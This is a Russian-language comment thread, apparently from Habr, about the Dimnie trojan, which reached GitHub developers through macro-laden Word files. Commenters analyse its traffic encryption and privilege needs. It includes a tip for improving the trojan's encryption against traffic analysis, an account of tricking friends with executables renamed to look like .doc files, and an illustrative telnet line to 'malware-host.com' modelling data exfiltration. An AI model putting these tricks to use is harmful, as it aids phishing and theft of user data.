Pull to refresh

Comments 23

В GET-запросе троян передаёт ключ AES 256 ECB, который затем используется для шифрования трафика.

Круче было бы, если бы он с командного сервера получал открытый ключ, и шифровал всё пересылаемое уже им. Тогда из анализа трафика будет даже непонятно, что именно интересного троян увёл.

UFO just landed and posted this here
UFO just landed and posted this here
UFO just landed and posted this here
Тоже получил такое письмо. Выглядело подозрительно. Сомневаюсь, что кто-то из разрабов открывал этот документ
«Но если кто-то из зазрабов работает под Windows и открывает документы Microsoft Word, то вы это заслужили.»? ;)

Мне уже давно не приходят письма со вложениями от спамеров.
В основном предлагают скачать с Яндекс диска.
Гораздо интереснее атака когда батник или экзешник переименовывается в Лехе.doc хотя на самом деле это файл Лdoc.ехе тоже самое с файлом Хоtab.doc.
Я попробовал для теста через Гугл отправлять эти документы, но он не пропустил, сразу сказал що низя.
А вот Яндекс вроде как пропустил, давно уже было не помню.
Но оба сервиса разрешили отправить ссылки на эти файлы.
Причем 2-е из десятка знакомых повелись на этот трюк.
Выскочило сообщение, что типа я их хакнул. Трое отписались мне и написали мне, что меня взломали %).
Собсно тест удался.

если вы разработчик, который работает под Windows (троян использует PowerShell) и открывает документы Microsoft Word

… под локальным администратором...

UFO just landed and posted this here
Тоже стало интересно. Насколько же уязвимы альтернативные продукты, против макросов прикрученных к подобным «документам»?

Тоже не запускает. Приходится добавлять в исключения чтобы макросы в конкретных документах работали, либо настраивать уровень безопасности макросов на "разрешить все" принудительно.
И вообще, макрос там должен быть целевой, порой с разных версий макросы уже не совместимы, темболее макросы микрософта с опенофисом.

Мне тоже кажется, что макросы блокируются по-умолчанию
то есть, никого не взломали, я правильно понял?))
Попытался представить, на какую рыбу эта снасть.
Получился разработчик, участвующий в некоем проекте, интересующем западные спецслужбы, при этом имеющий свои наработки, которые он складывает на Гиту, пишущий под винду и под виндой, и использующий для коммуникации Аутлук.
Мда… :)
UFO just landed and posted this here
экземпляр трояна Dimnie, который использовался несколько лет (предположительно, спецслужбами)
Ализар, конечно, такой Ализар… но то, как этот зловред маскируется, наводит на мысль, что целью могли быть достаточно серьезные организации.
UFO just landed and posted this here
«Модуль самоуничтожения» как-то странно выглядит, не так ли?
Предупреждает, что будет все стирать, да еще и реально ждет 3 сек. :)
Но дело в том, что троян вставляет IP-адрес, полученный от DNS-сервера, в заголовок IP-пакета, который выглядит как запрос HTTP GET к серверу Google.


Как-то слишком сложно написано. Вероятно имелось в виду, что происходит подключение к указанному адресу, куда и отправляется GET запрос.
Вроде этого:
$ telnet malware-host.com 80
POST http://gmail.com/upload.php HTTP/1.0
...

Действительно, неожиданно для антивирусов и файрволов…

Но если троянец действительно с легкостью правит IP-пакеты и
Интересно, что один из них — модуль самоуничтожения, который стирает всю информацию на диске C:\.

То ему бы потребовались права администратора.
1. RAW Sockets требуют таких прав:
Note To use a socket of type SOCK_RAW requires administrative privileges. Users running Winsock applications that use raw sockets must be a member of the Administrators group on the local computer, otherwise raw socket calls will fail with an error code of WSAEACCES. On Windows Vista and later, access for raw sockets is enforced at socket creation. In earlier versions of Windows, access for raw sockets is enforced during other socket operations.

2. У пользователя нет прав для удаления файлов из корня системного диска (за исключением файлов в его домашней папке). И это я уже не говорю о том, что не всегда диск C: == «Системный диск».

Таким образом, тот, кто это барахло запускает, должен:
1. Принудительно включить макросы в документе, проигнорировав все предупреждения MS Word или Writer (а они, насколько мне известно, по умолчанию выдают кучу предупреждений «Вы точно-точно-точно хотите запустить макрос?», и то, после того, как пользователь сам осознанно полезет в меню безопасности);
2. Согласиться с повышением привилегий при запуске скачанной малвари.

И это правда сделает человек-разумный-пользователь-git? Хотя, люди разные бывают…
Sign up to leave a comment.

Articles